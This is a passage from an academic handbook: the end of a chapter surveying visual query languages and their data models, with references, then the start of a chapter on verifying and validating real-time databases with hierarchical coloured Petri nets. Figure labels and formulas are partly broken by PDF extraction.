Figure 6. The visual definition of a query in the PROOVE environment DATABASE SCHEMA : (click on an object-node for querying)
QUERY GRA PH: (Press on the right mouse button over the nodes to get popup menu)
cname:string
borrower
person
v3
sname:string borrower1 librari an
salary:string
v4
works_at stockitem
item_type
Itemid:integer libname:string
loan1
stockitem1
book1
v6
is:at library
location:string vs
loan
stockitem item_type author:string QUERY CONDITION: (Click on the condition button to enter conditions) book
day:integer
date:date
book_title:string
V3 = Scott
year:integer
month:integer
year:integer
1013
Visual Query Languages, Representation Techniques, and Data Models
Figure 7. An example of query expressed in VOODOO language
Department
bag
Instructor
head
P
cond
P
name
dno
P
address salary
Persistent root P
P
G
P
G
name
P
P
G
head
P
rank
P
G
Instructors
P
degrees
P
G
Courses_offered
P
dept
P
teaches
Persons
P
Instructors
P
Depart ments
P
Courses
to QBE. Figure 7 represents the query “Find the name of the department whose head is Smith” in the VOODOO language. Finally, Chavda and Wood (1997) propose the Quiver language with a fairly modular approach combining graphs with an iconic interface. Here, graphs are used not only to describe the database structure (as in many other VQLs), but also to represent the data flow to and from computations, for example the data flow corresponding to the application of a method to a class of objects. Furthermore, graphs are generally nested, as each node can include other nodes and possibly arcs and bold nodes and arcs are used to define the query output schema visually.
VQLs Based on the XML Data Model The extensible markup language (XML) is a general-purpose textual language specifically designed to define various kinds of data structures (i.e., the database schema) as well as to store the data contents in XML documents (the database instance). The typical hierarchical structure of XML documents is reflected in the VQLs based on this language and naturally leads to the adoption of graph-based visual models. The standard textual
1014
string
ssn
head cond
Smith
query language for XML is XQuery (Boag et al., 2006), which is based on the so-called FLWOR (for-let-where-order by-return) expressions and has some similarities with the SQL syntax. XQBE (XQuery by example) was proposed by Braga, Campi, and Ceri (2005) to visually express a fairly large subset of XQuery and can be considered as an evolution of XML-GL (Comai, Damiani, & Fraternali, 2001). The main graphical element in XQBE is the tree, which is used to denote both the documents assumed as query input (the input schema) and the document produced by the query (the output schema). Tree nodes represent the various elements of the XML documents and are shaped in different ways according to the specific semantics. In particular: (1) root nodes are represented as grey squares labelled with the location (URI) of the corresponding XML document; (2) element nodes are shaped as rectangles labelled with the element name (or tagname); (3) PCDATA nodes are represented as empty circles, (4) attribute nodes are represented as filled black circles. Other node types and notations are introduced to express specific manipulations and selections. Finally, directed arcs are used to represent the containment relationship between two XML items. For example, Figure 8 shows the
Visual Query Languages, Representation Techniques, and Data Models
Figure 8. Example of XQBE query
www.bn.co m/bib.xml
bib
book
myBook
author
title
XQBE formulation of the query “Return all books in the source document, retaining for each book only the list of their authors and the title; change also the tagname to myBook.” Figure 8 shows that the query window is divided into two parts: the source (corresponding to the input schema) on the left and the construct (corresponding to the output schema) on the right. Obviously, the source part describes the structure to be matched against the set of input documents, while the construct part specifies which elements will be retained in the result, together with (optional) newly generated items. The two parts are linked by binding edges expressing the correspondence between the respective components. Tree structures with variously shaped nodes are also used in the XQueryViz tool (Karam, Boulos, Ollaic, & Koteiche, 2006), which is strongly related to the XQuery syntax and whose interface is based on four interdependent windows displaying (1) the XML schemas and documents; (2) the for-let-where clause of the query in visual form; (3) the return clause of the query in visual form; (4) the textual XQuery representation of the query. During query formulation, the textual representation is continuously updated and the
various parts are given different colors to reflect the correspondence between the visual and its textual counterpart. The Xing language (Erwig, 2003) uses a completely different approach to the representation of the typical hierarchical structure of XML documents. Here, XML elements are represented by nested boxes/forms and the hierarchies between elements by relationships of visual inclusion. As in many other VQLs, the query is expressed by defining, in two separate sections of the visual interface, the input schema, through an argument pattern, which specifies the structural and content constraints, and the output schema, through a result pattern, which performs selection, and restructuring operations on the extracted data.
VQLs and Special Purpose Data Several interesting applications of VQLs can be found in contexts where the data have some explicit geometric properties, describe some spatial relationships, or are commonly described by means of a geometric metaphor. This is obviously the case in geographical information systems (GISs), but also in data warehouses, which are based on the well-known metaphor of the multi-dimensional data cube and in scientific databases containing for instance scientific experimental data. In geographic information systems (GISs), topological relationships between geographical entities can be expressed very intuitively in visual form. VQLs for this kind of data usually represent geographical entities with a very limited number of symbolic graphical objects (SGOs) namely point, polyline, and polygon. In several languages queries are expressed by drawing a geometric pattern (e.g., two intersecting polygons, a polygon including another polygon, a polyline adjacent to a polygon, etc.) corresponding to the desired result. For example in Cigales (Aufaure-Portier, 1995), queries are expressed using predefined graphical forms (icons) representing both the geographical entities and the topological relationships among
1015
Visual Query Languages, Representation Techniques, and Data Models
them while in pictorial query-by-example (Papadias & Sellis, 1995) skeleton arrays are used to represent a set of objects and their spatial relationships. The inherent ambiguity of some geometric patterns has been studied by several authors and Ferri & Rafanelli (2005) propose the introduction of specific G-any and G-alias operators to cope with this issue. As previously discussed, an important family of VQLs for GISs is based on sketches (e.g., Sketch! (Meyer, 1992), spatial-query-by-sketch (Egenhofer, 1997), and VISCO (Haarslev et al., 1997)). Data warehouses are traditionally described using the well-known metaphor of the multi-dimensional data cube and the concepts of dimensions and dimension hierarchies. A data cube is a collection of aggregate values (measures) classified according to several properties of interest (dimensions), each of which is possibly organized in hierarchies. Combinations of dimension values are used to identify the single aggregate values in the cube and querying is often an exploratory process, where the user “moves” along the dimension hierarchies by increasing or reducing the granularity of displayed data. A diagrammatic VQL for multidimensional data was proposed by Cabibbo and Torlone (1998) and is based on a graphical diagrammatic representation of the data warehouse schema where hierarchies are represented by directed arcs and dimensions by enclosing shapes. As in many other diagrammatic VQLs, the output data is selected by expressing constraints on the schema elements and highlighting the desired measures and dimension levels on the warehouse schema. An example of VQL for the exploratory navigation of scientific data is VISUAL (Balkir et al., 2002), which was designed for the domain of materials engineers for use with scientific experimental data, in particular their spatial properties. VISUAL uses icons to represent both the objects of interest and their spatial relationships, and users can define their own graphical icons
1016
to recreate the environment that they are familiar with. Although graphical, the structure of a VISUAL query closely resembles datalog rules with a body section containing iconized objects, constraints, and references to other objects (i.e., the input schema) and a head section representing the various components of the query output.
CONCLUSION In this chapter, we analyzed some fundamental characteristics of VQLs (i.e., visual languages specifically designed to retrieve data from information systems). A first important feature is the set of visual representation techniques used to formulate the queries. We have shown that VQLs can be broadly classified as (1) tabular or form based, using prototype tables with table fields filled in with constant values and expressions; (2) diagrammatic, based on the use of simple geometric shapes connected by arcs; (3) iconic, based on the use of icons to represent both the objects in the database and the operators to manipulate them; (4) sketch-based, where the query is formulated by freehand sketches on a virtual blackboard; and finally (5) hybrid, combining two or more of these approaches. Secondly, we have analyzed the relationships between VQLs and the features of the underlying data model, with a specific focus on the level of abstraction, the most commonly used data models (conceptual, relational, object, functional, XML) and information systems specifically designed for particular kinds of data such as GISs and data warehouses.
REFERENCES Abiteboul, S., Hull, R., & Vianu, V. (1995). Foundations of databases. Addison-Wesley. Angelaccio, M., Catarci, T., & Santucci, G. (1990). QBD*: A fully visual query system.
Visual Query Languages, Representation Techniques, and Data Models
Journal of Visual Languages and Computing, 1(2), 255-273.
Conference on Advanced Visual Interfaces (AVI 2000) (pp. 211-216).
Atkinson, M. P., Bancilhon, F., DeWitt, D. J., Dittrich, K. R., Maier, D., Zdonik, S. B. (1989). The object-oriented database system manifesto. The 1st International Conference on Deductive and Object-Oriented Databases (DOOD’89) (pp. 223-240).
Bloesch, A. C., & Halpin T. A. (1996). ConQuer: A conceptual query language. International Conference on Conceptual Modeling (ER 1996) (pp. 121-133).
Atzeni, P., Ceri, S., Paraboschi, S., & Torlone, R. (1999). Database systems: Concepts, languages, and architectures. McGraw-Hill.
Boag, S., Chamberlin, D., Fernandez, M. F., Florescu, D., Robie, J., & Simeon, J. (2006). XQuery 1.0: An XML query language. Retrieved October 13, 2006, from http://www.w3.org/TR/xquery/
Aufaure-Portier, M. A. (1995). A high level interface language for GIS. Journal of Visual Languages and Computing, 6(2), 167-182.
Braga, D., Campi, A., & Ceri, S. (2005). XQBE (XQuery by example): A visual interface to the standard XML query language. ACM Transactions on Database Systems, 30(2), 398-443.
Aufaure-Portier, M. A., & Bonhomme, C. (1999). A high-level visual language for spatial data management. The 3rd International Conference on Visual Information and Information Systems (VISUAL 1999) (pp. 325-332).
Cabibbo, L., & Torlone, R. (1998). From a procedural to a visual query language for OLAP. International Conference on Scientific and Statistical Database Management (SSDBM’98) (pp. 74-83).
Aversano, L., Canfora, G., De Lucia, A., & Stefanucci, S. (2002). Understanding SQL through iconic interfaces. The International Computer Software and Applications Conference (COMPSAC 2002) (pp. 703-710).
Catarci, T., Costabile, M. F., Levialdi, S., & Batini, C. (1997). Visual query systems for databases: A survey. Journal of Visual Languages and Computing, 8(2), 215-260.
Balkir, N. H., Ozsoyoglu, G., & Ozsoyoglu, Z. M. (2002). A graphical query language: Visual and its query processing. IEEE Transactions on Knowledge and Data Engineering, 14(5), 955-978. Benzi, F., Maio, D., & Rizzi, S. (1999). VISIONARY: A viewpoint-based visual language for querying relational databases. Journal of Visual Languages Computing, 10(2), 117-145. Blackwell, A. F., & Green, T. R. G. (1999). Does metaphor increase visual language usability? IEEE Symposium on Visual Languages (VL’99) (pp. 246-253). Blaser, A. D., & Egenhofer, M. J. (2000). A visual tool for querying geographic databases. Working
Catarci, T., Santucci, G., & Angelaccio, M. (1993). Fundamental graphical primitives for visual query languages. Information Systems, 18(3), 75-98. Chavda, M., & Wood, P. T. (1997). Towards an ODMG-compliant visual object query language. International Conference on Very Large Data Bases (VLDB’97) (pp. 456-465). Chen, P. P. (1976). The entity-relationship model: Towards a unified view of data. ACM Transactions on Database Systems, 1(1), 9-36. Codd, E. F. (1970). A relational model of data for large shared databanks. Communications of the ACM, 13(6), 377-387. Comai, S., Damiani, E., & Fraternali, P. (2001). Computing graphical queries over XML data.
1017
Visual Query Languages, Representation Techniques, and Data Models
ACM Transaction on Information Systems 19(4), 371-430.
tool. International Conference on Internet and Web Applications and Services (ICIW’06).
Czejdo, B., Embley, D., Reddy, V., & Rusinkiewicz, M. (1989). A visual query language for an ER data model. IEEE Workshop on Visual Languages (pp. 165-170).
Larkin, J. H., & Simon, H. (1987). Why a diagram is (sometimes) worth ten thousand words. Cognitive Science, 11(1), 65-100.
Dennebouy, Y., Andersson, M., Auddino, A., Dupont, Y., Fontana, E., Gentile, M., & Spaccapietra, S. (1995). SUPER: Visual interfaces for object + relationships data models. Journal of Visual Languages and Computing, 6(1), 73-99. Doan, D. K., Paton, N. W., Kilgour, A. C., & al-Qaimari, G. (1995). Multi-paradigm query interface to an object-oriented database. Interacting with Computers, 7(1), 25-47. Egenhofer, M. J. (1997). Query processing in spatial-query-by-sketch. Journal of Visual Languages and Computing, 8(4), 403-424. Erwig, M. (2003). Xing: A visual XML query language. Journal of Visual Languages and Computing 14(1), 5-45. Fegaras, L. (1999). VOODOO: A visual objectoriented database language for ODMG OQL. ECOOP Workshop on Object-Oriented Databases (pp. 61-72). Ferri, F., & Rafanelli, M. (2005). GeoPQL: A geographical pictorial query language that resolves ambiguities in query interpretation. Journal on Data Semantics, 50-80.
Massari, A., Pavani, S., & Saladini, L. (1994). QBI: an iconic query system for inexpert users. Working Conference on Advanced Visual Interfaces (AVI’94) (pp. 240-242). Meyer, B. (1994). Pictorial deduction in spatial information systems. IEEE Symposium on Visual Languages (VL94) (pp. 23-30). Meyer, B. (1992). Beyond icons: Towards new metaphors for visual query languages for spatial information systems. International Workshop on Interfaces to Database Systems (IDS’92) (pp. 113-135). Murray, N., Paton, N. W., & Goble, C. A. (1998). Kaleidoquery: A visual query language for object databases. Working Conference on Advanced Visual Interfaces (AVI’98) (pp. 247-257). Papadias, D., & Sellis, T. K. (1995). A pictorial query-by-example language. Journal of Visual Languages and Computing, 6(1), 53-72. Papantonakis, A., & King, P. J. H. (1994). Gql, a declarative graphical query language based on the functional data model. Workshop on Advanced Visual Interfaces (AVI’94) (pp. 113-122).
Haarslev, V., & Wessel, M. (1997). Querying GIS with animated spatial sketches. The 13th IEEE Symposium on Visual Languages 1997 (VL’97) (pp. 201-208).
Polyviou, S., Samaras, G., & Evripidou, P. (2005). A relationally complete visual query language for heterogeneous data sources and pervasive querying. International Conference on Data Engineering (ICDE’05) (pp. 471-482).
Haber, E. M., Ioannidis, Y. E., & Livny, M. (1994). Foundations of visual metaphors for schema display. Journal of Intelligent Information Systems, 3(3-4), 263-298.
Rosengren, P. (1994). Using visual ER query systems in real world applications. Advanced Information Systems Engineering (CAiSE’94) (pp. 394-405), LNCS 811.
Karam, M., Boulos, J., Ollaic, H., & Koteiche, Z. (2006). XQueryViz: A visual dataflow Xquery
Sentissi, T., & Pichat, E. (1997). A graphical user interface for object-oriented database. Interna-
1018
Visual Query Languages, Representation Techniques, and Data Models
tional Conference of the Chilean Computer Science Society (SCCC’97) (pp. 227-239). Sibley, E. H., & Kerschberg, L. (1977). Data architecture and data model considerations. AFIPS National Computer Conference. Staes, F., Tarantino, L., & Tiems, A. (1991). A graphical query language for object-oriented databases. IEEE Symposium on Visual Languages (VL’91) (pp. 205-210). Vadaparty, K., Aslandogan, Y. A., & Ozsoyoglu, G. (1993). Towards a unified visual database
access. In ACM SIGMOD International Conference on Management of Data (SIGMOD’93) (pp. 357-366). Zhang, G., Chu, W. W., Meng, F., & Kong, G. (1999). Query formulation from high-level concepts for relational databases. International Workshop on User Interfaces to Data Intensive Systems (UIDIS’99) (pp. 64-75). Zloof, M. M. (1977). Query-by-example: A database language. IBM Systems Journal, 16(4), 324-343.
This work was previously published in Visual Languages for Interactive Computing: Definitions and Formalizations, edited by F. Ferri, pp. 142-157, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
1019
1020
Chapter 3.10
A Formal Verification and Validation Approach for Real-Time Databases Pedro Fernandes Ribeiro Neto Universidade do Estado do Rio Grande do Norte, Brazil Maria Lígia Barbosa Perkusich Universidade Católica de Pernambuco, Brazil Hyggo Oliveira de Almeida Federal University of Campina Grande, Brazil Angelo Perkusich Federal University of Campina Grande, Brazil
ABSTRACT Real-time database-management systems provide efficient support for applications with data and transactions that have temporal constraints, such as industrial automation, aviation, and sensor networks, among others. Many issues in real-time databases have brought interest to research in this area, such as: concurrence control mechanisms, scheduling policy, and quality of services management. However, considering the complexity of
these applications, it is of fundamental importance to conceive formal verification and validation techniques for real-time database systems. This chapter presents a formal verification and validation method for real-time databases. Such a method can be applied to database systems developed for computer integrated manufacturing, stock exchange, network-management, and command-and-control applications and multimedia systems. In this chapter, we describe a case study that considers sensor networks.
A Formal Verification and Validation Approach for Real-Time Databases
INTRODUCTION Nowadays, the heterogeneity of platforms, distributed execution, real-time constraints, and other features are increasingly making software development a more complex activity. Besides, the amount of data to be managed is increasing as well. Taken together, complexity and data management are causing both risk and cost of software projects to get higher. Database management systems are used to manage and store large amounts of data efficiently. However, when both data and transactions have timing restrictions, real-time databases (RTDB) are required to deal with real-time constraints (Ribeiro-Neto, Perkusich, & Perkusich, 2004). For an RTDB, the goal is to complete transactions on time, while maintaining logical and temporal consistency of the data. For real-time systems, correct system functionality depends on logical as well as on temporal correctness. Static analysis alone is not sufficient to verify the temporal behavior of real-time systems. To satisfy logical and temporal consistency, concurrency control techniques and time-cognizant transactions processing can be used, respectively. The last occurs by tailoring transaction management techniques to explicitly deal with time. The real-time ability defines nonfunctional requirements of the system that must be considered during the software development. The quality assurance of real-time systems is necessary to assure that the real-time ability has been correctly specified. Imprecise computation is used as a technique for real-time systems where precise outputs are traded off for timely responses to system events. For that, formal models can be created to verify the requirement specifications, including the real-time specifications (RibeiroNeto, Perkusich, & Perkusich, 2003). Validation as well as verification can be carried out by simulation model. With the simulation model, a random sample will be selected from the input domain of the test object, which is then
simulated with these chosen input values. After that, the results obtained by this execution are compared with the expected values. Thus, a simulation model is as a dynamic technique, that is a technique that contains the execution of the test object. One major objective of simulation models is error detection (Herrmann, 2001). The main motivation for this research is the fact that methods to describe conceptual models of conventional database systems cannot be directly applied to describe models of real-time database systems. It occurs because these models do not provide mechanisms to represent temporal restrictions that are inherent to real-time systems. Also, most of the available models focus on the representation of static properties of the data. On the other hand, complex systems, such as real-time databases, also require the modeling of dynamic properties for data and information. Therefore, the development of methods to design real-time databases with support for both static and dynamic modeling is an important issue. In the literature, there are few works for real-time database modeling that allow a formal analysis, considering verification and validation characteristics. The existing tools for supporting modeling process especially do not present simulation capacity. The unified modeling language (UML) approach presents a number of favorable characteristics for modeling complex real-time systems, as described in Selic and Rumbaugh (1998) and Douglass (2004). UML also is used for modeling object-oriented database systems. However, the existing tools for UML modeling do not present simulation capacity. This chapter describes a formal approach to verify and validate real-time database systems. The approach consists of the application of the five steps: (1) building an object model; (2) building a process model; (3) generating an occurrence graph; (4) generating a message-sequence chart; and (5) generating a timing diagram. The two first steps include static and dynamic analysis, respectively. The following steps allow the user
1021
A Formal Verification and Validation Approach for Real-Time Databases
to validate the model. Hierarchical coloured Petri nets (HCPNs) are used as the formal language to describe RTDB models (Jensen, 1998). The proposed approach can be applied to different domains, such as computer-integrated manufacturing, stock exchanges, network management, command-and-control applications, multimedia systems, sensor networks, and navigation systems. In this chapter, we describe a case study considering sensor networks. Sensor networks are used to control and to monitor the physical environment and sensor nodes may have different physical sensors and can be used for different application scenarios. The remainder of this chapter is presented as follows. First, a background is presented, to ease the comprehension of approach. Concepts about RTDB, quality of services and HCPNs are defined. Second, the formal verification and validation approach for real-time databases is described as well as a sensor network case study. Third, future trends are presented. Finally, conclusions are presented.
BACKGROUND Real-Time Databases (RTDB) The real-time database-management systems must provide the characteristics of conventional databases besides assuring that the real-time constraints are imposed on both the data and transactions. These constraints arise in applications where the transactions must meet deadlines. The amount of applications that benefit from the utilization of RTDB is increasing as well. This increase is a consequence of the proliferation of embedded systems that includes both systems that are similar to those present in personal computers and smaller systems with a minimal memory and calculator capacity, such as those present in mobile devices. An RTDB is required when: The volume of data is large; responses depend on multiple values; responses to aperiodic events are required; and there are constrained timing requirements. The correctness in real-time databases implies: sat-
Figure 1. Real-time database systems raditi y y y y
al data ase s ste s
Data management Transaction support Concurrency control Query processing
A Formal Verification and Validation Approach for Real-Time Databases
isfying all usual consistency constraints; executing transactions within timing constraints; and satisfying temporal consistency of the data. The real-time data and transactions are also defined. The data items reflect the state of the environment. The transactions are classified with respect to their deadlines, such as hard, soft, or firm; arrival-pattern — periodic, aperiodic, sporadic; and data-access-pattern — read-only, write-only and update. In Figure 1, a schema illustrating the properties of the RTDB is shown.
Data Properties The data correctness in RTDB is assured by logical and temporal consistency. The real-time data can be classified into static and dynamic. The correctness of static data is guaranteed by the logical consistency, since is has not become outdated. The dynamic data may change continuously to reflect the real-world state, such as object positions, physic measure, stock market, and so on. Each dynamic datum has a timestamp of the latest update and the data can be divided into base data and derived data. A derived datum can be derived from various base data (Kang, 2001). The external consistency of dynamic data is defined using validity intervals to assure the consistency between the state represented by the database content and the actual state of environment. The validity intervals are of two types as follows (Kang, 2001): •
•
Absolute validity interval (avi) is defined between the environment state and the value reflected in the database. The data x is considered temporally inconsistent if (now - timestamp(x) > avi(x)), where now is the actual time of system, timestamp is the time of the latest update of data. Relative validity interval (rvi) is defined among the data used to derive other data. Consider a data item y is derived from a data
set R={x1,x2,...,xk}. y is temporally consistent if the if the data in R that the compose are temporally valid and the |timestamp(xi R) - timestamp(xj 0 R) | ≤ rvi(y). This measure arises to produce derived data from data with the approximate time. The dynamic data are represented by x:(value,avi,timestamp) and will be temporally consistent. If both absolute and relative validity interval are satisfied. Consider the example where a data item t, with avi(t)=5, reflect the current temperature and the data item p represent the pressure with avi(p)=10. The data item y is derived from data set R={t,p} and have relative validity interval rvi(y)=2. If the actual time is 50, then (a) t:(25,5,45) and p:(40,10,47) are temporally consistent because as absolute validity interval as relative validity interval is valid. But, (b) t:(25,5,45) and p:(40,10,42) are not temporally consistent, because only the absolute validity interval is assured.
Transaction Properties The real-time transactions are characterized along three dimensions based on the nature of transactions in real-time database systems: the nature of real-time constraints, the arrival pattern, and the data-access type. •
Real-time constraints: The real-time constraints of transactions are related to the effect of missing its deadline and can be categorized in hard, firm and soft. Hard deadlines are those that may result in a catastrophe if the deadline is missed. These are typically critical systems, such as a command delayed to stop a train causing a collision. To complete a transaction with a soft deadline after its time constraint is undesirable. However, soft deadlines missed can commit
1023
A Formal Verification and Validation Approach for Real-Time Databases
•
•
the system performance. The transactions with firm deadline will be aborted if its temporal constraints are lost. Arrival pattern of transactions: The arrival pattern of transactions refers to time interval of execution. Generally, the transactions are periodically executed in real-time databases, since they are used to record the device reading associated to the environment or to manipulate system events. The arrival pattern can be aperiodic, where there is not a regular time interval between the executions of transactions. The transactions also can execute in random time. However, there is a minimal time interval between the executions of transactions. Data access type: In relation to data access, the transactions are categorized as: write transactions (or sensors), update transactions, and read transactions. The write transactions obtain the state of the environment and write into the database. The update transactions derive new data and store them in the database. Finally, the read transactions read data from database and send them.
In the database, it is necessary to guarantee the same views, of the same data item, for different transactions. This property is called internal consistency and is assured by the ACID properties. ACID is an acronym for atomicity, consistency, isolation, and durability. These properties are defined for a real-time database as follows: •
•
1024
Atomicity: Is applied for subtransactions, where a subtransaction must be whole executed or neither step must be considered of them. Consistency: The transaction execution must always change the consistent state of a database in another consistent state. An imprecision limited in the internal consis-
•
•
tency can be permitted in order to meet the temporal constraints of transactions. Isolation: The actions of a transaction can be visible by other transactions before it commits. Durability: The actions of a transaction need not be persistent, since both data and transactions have temporal validity.
Concurrency Control The negotiation between logical and temporal consistency, a concurrency-control technique should be capable of using knowledge about the application to determine which transactions can be executed concurrently. Such a technique, named semantic concurrency control, allows increasing the concurrent execution of transactions (method invocation). Based on the knowledge of the application the designer must define which transactions may be concurrently executed and when. Defining compatibilities between the executions of the transactions does this. Therefore, this technique allows relaxing the ACID properties. Transactions in real-time do not need to be serialized, especially updated transactions that record information from the environment. However, the consequence of relaxing serialization is that some imprecision can be accumulated in the database, and in the vision of the database. An object-oriented semantic concurrency control technique, described in DiPippo (1995), named semantic-lock technique, allows logical and temporal consistency of the data and transactions and allows the negotiation among them. The technique also allows the control of the imprecision resulting from the negotiation. The concurrency control is distributed among the objects, and a compatibility function, says CF for short, is defined for each pair of methods for database objects. CF is defined as follows: CF(mati ,minv) = Boolean Expression → IA
A Formal Verification and Validation Approach for Real-Time Databases
where mati represents the method that is being executed and, minv represents the method that was invoked. The Boolean Expression can be defined based on predicates involving values of the arguments of the methods, the database attributes, and the system in general. IA is defined by an expression that evaluates the accumulated imprecision for the attributes of the database object and for the arguments of the methods. The consequence of using such a concurrency control is that more flexible scheduling for transactions can be determined than those allowed by serialization. Besides, that technique can specify and limit some imprecision that may appear in the system due to relax of the serialization.
whether a new user can be served, while resource reservation has to be called as soon as the user is admitted, in order to guarantee the requested service quality. The negotiation function has the role of the compability function, described above. We define two performance metrics to guarantee the RTDB performance. These metrics are shown as follows: 1.
Quality of Service (QoS) Management In a real-time database, the QoS management can help to verify both the correctness and performance of a system, through functions and performance metrics. This is necessary, since the real-time transactions have temporal constraints. Therefore, we consider transactions correct only if they finish within their deadlines using valid data. The functions defined are the functions of specification, mapping, negotiation, and monitoring. The function specification defines which QoS parameters are available and determines their syntax and semantics. The mapping function has to be provided to translate the QoS requirements expressed. The role of a QoS negotiation mechanism is to determine an agreement for the required values of the QoS parameters between the system and the users or applications. A QoS negotiation protocol is executed, every time a new user or application joins an active session, to verify whether the system has enough resources to accept the new user or application request without compromising the current performance. This function usually employs several QoS mechanisms to fulfill its task, such as: admission control is used to determine
Number of transactions that miss the deadline in relation to the amount of transactions that finish with success (Pt): This metric set up the rate of missed deadline of transactions that can be allowed during a time interval. The metric is defined as: t =1
2.
issed ead ine ⎞ ⎛ ⎜ ⎟ ⎝ inis Transactions ⎠
where Pt is the amount of transactions that miss the deadline (MissedDeadline) in relation to the amount of transactions that finish with success (FinishTransactions). Upper imprecision of data (Impr): Is the threshold of imprecision admitted in the data item for it to be considered logically valid. Impr is defined as: ⎛ mp ⎞ mpr = urrent a ue ⎜ ⎟ ⎝1 ⎠
where CurrentValue is the value of data item stored in database and Imp is the index of amount of imprecision admitted.
HCPN-Based Modeling Hierarchical Coloured Petri Nets Hierarchical coloured Petri nets (HCPNs) are an extension of coloured Petri nets (CPNs) (Jensen, 1998) and are a suitable modeling language for verifying systems, as they can express concur-
1025
A Formal Verification and Validation Approach for Real-Time Databases
Figure 2. Coloured Petri net u stituti Input Port
Fusion Place
ra siti Fusion Place
Socket Output Port
u
a e
Socket
u er a e
rency, parallelism, nondeterminism, and different levels of abstraction. In Figure 2, a Petri net is illustrated, where hierarchical levels are allowed. These hierarchical levels are possible due to the inclusion of two mechanisms: substitution transitions and fusion places. A substitution transition is a transition that will be replaced by a CPN page. The page to which the substitution transition belongs is called a superpage and the page represented by the transition is called the subpage. The association between subpages and superpages is performed by means of sockets and ports. Sockets are all the input and output places of the transition in the superpage. Ports are the places in the subpage associated to the sockets. The ports can be input, output, or input-output. For simulation and state, space-generation sockets and ports are glued together and the resulting model is a flat CPN model. The fusion places are physically different but logically only one forming a fusion set. Therefore, all the places belonging to a fusion set have always the same marking. A marking of a place is the set of tokens in that place in a given moment. The marking of a net
1026
is the set of markings of all places in the net at a given moment (Jensen, 1998). Indeed, these two additional mechanisms, substitution transitions and fusion places, are only graphical, helping in the organization and visualization of a CPN model. They favor the modeling of larger and more complex systems by giving the designer the ability to model by abstraction, specialization, or both.
Design/CPN Tools Design/CPN (Jensen et al.,1999) is a tool package supporting the use of HCPN. The Design/CPN tool has four integrated parts: 1.
2. 3.
The CPN editor supports construction, modification, and syntax check of CPN models. The CPN simulator supports interactive and automatic simulation of CPN models. The occurrence graph tool supports construction and analysis of occurrence graphs for CPN models (also known as state spaces or reachability graphs/trees).
A Formal Verification and Validation Approach for Real-Time Databases
4.
The perfomance tool suppor ts simulation=based performance analysis of CPN models.
The design/CPN package is one of the most used Petri net tools. Design/CPN supports CPN models with complex data types (colour sets) and complex data manipulations (arc expressions and guards), both specified in the functional programming language Standard ML(Jensen et al., 1999).
1.
2.
REAL-TIME DATABASE VERIFICATION AND VALIDATION METHOD 3. The formal verification and validation method for real-time database systems consists of the application of the following steps, as illustrated in Figure 3, which are detailed in this section:
4.
Build an object model: It is used to specify the requirements and identify the main components of the system. It is also used to model static properties of objects, such as attributes, operations, and logical and timing constraints. In any way, the object model defines the discourse universe to the process model. Build a process model: It is used to model both functional and dynamic properties of objects. The functional properties define the object operations, while the dynamic property represents the temporal interactions of objects and its answers to the events. The process model is composed of the operations identified in the object model. Generate an occurrence graph: It is a representation of the state space of the HCPN model. Generate a message sequence chart: They are generated for each scenario, considering a possible execution sequence.
Figure 3. Real-time database verification and validation method
1027
A Formal Verification and Validation Approach for Real-Time Databases
5.
Generate a timing diagram: It is a diagram to show the timing constraints in time sample.
Build an Object Model 3. In the object model each object is a unique entity. Objects with the same data structure (attributes) and behavior (operations), in the context of the particular application environment are grouped into an object class. Classes can be grouped in a hierarchical structure. Classes may have attributes; the attributes are structural properties of classes that can have both logical and temporal constraints; the relationships are the links between the classes; the operations are functions or procedures applicable to the class attributes, and the method is the implementation of an operation (Rumbaugh, Blaha, Premerlani, Eddy, & Lorensen, 1991). The object model consists of a set of: class diagram, object diagram, and data dictionary. The class diagrams have shown the general description of the system, while the object diagrams shown object instances. The data dictionary defines whole entities modeled (class, associations, attributes, operations). The object model begins with the problem declaration analysis and has the following steps: 1.
2.
1028
Identification of the objects: The external actors and objects that interact with the system are identified as the problem context. Elements of the object model that emerge from the analysis of the real problem are directly mapped into logical objects. Each instance of an object is assumed to be unique. The objects in an object class have a unique identity that separates and identifies them from all other object instances. Identification of relationships among objects: A conceptual relationship among instances of classes. Associations have car-
4.
5.
6.
7.
dinality including one-to-one, one-to-many, and many-to-many. Most object-oriented texts do not address the nature of an association (i.e., mandatory or optional), except in the definition of the object behavior. Addition of attributes to objects: a data value that can be held by the objects in a class. Attributes may be assigned to different data types (e.g., integer). Use of generalizations to observe similarities and differences: the essential characteristics of an object or class, ignoring irrelevant features, providing crisply defined conceptual boundaries. This maintains a focus upon identifying common characteristics among what may initially appear to be different objects. Abstraction enhances reusability and inheritance. Identification of operations: the direct manipulation of an object, categorized as: Constructor: create an object and/or initialize. Destructor: free the state of an object and/or destroy the object. Modifier: alter the state of the object. Selector: access and read the state of an object. Iterator: access all parts of an object in a well-defined order. Identification of concurrent operations: In this step, the designer analyzes the system to discover which operations need to be executed concurrently and in that condition this occurs. In follow, it is defined the function that details the situations which the operations can be executed concurrently. Identification of both logical and temporal constraints: The designer must declare both logical and temporal constraints to objects. These constraints define the correct states of each object. Thus, the constraints are defined as predicates that include the attributes value, time, and so on. For instance, the absolute validity interval defined to real-time data, in the Background section, expresses a temporal constraint to data objects.
A Formal Verification and Validation Approach for Real-Time Databases
Build a Process Model The process model captures both functional and dynamic properties of objects. This model is used in the analysis, design, and implementation phases of the software-development life cycle. These phases can be tackled concurrently, using hierarchical coloured Petri nets. HCPNs are used to analyze the system behavior. In this model, the objects are described through HCPN modules (or pages) that are defined from object models. Then, for each object that contains operations identified in the model, a HCPN module is created, where the correspondent operations are modeled. We use the design/CPN tool package (Jensen et al., 1999) for HCPN modeling. For that, the following steps must be performed: 1.
2.
3.
4.
Identification of the objects in HCPN: In this step, all of the objects in the object model are identified, and for each object identified an HCPN module is constructed. Identification of functions for each object: The operations that must be executed by each object are identified. What each object must execute is analyzed without considering its implementation. Definition of the interface for each object: The interface of each object is declared, indicating the methods with its respective argument of input and output, the constraints defined to the classes, besides functions that describe the compatibility between methods. Definition of the internal structure of each object: The methods detailed in the interface of objects are described, satisfying the requisites identified in the phase of identification of the objects.
Occurrence Graph (OG) The occurrence graph tool is closely integrated with the design/CPN tool package (Jensen et al.,
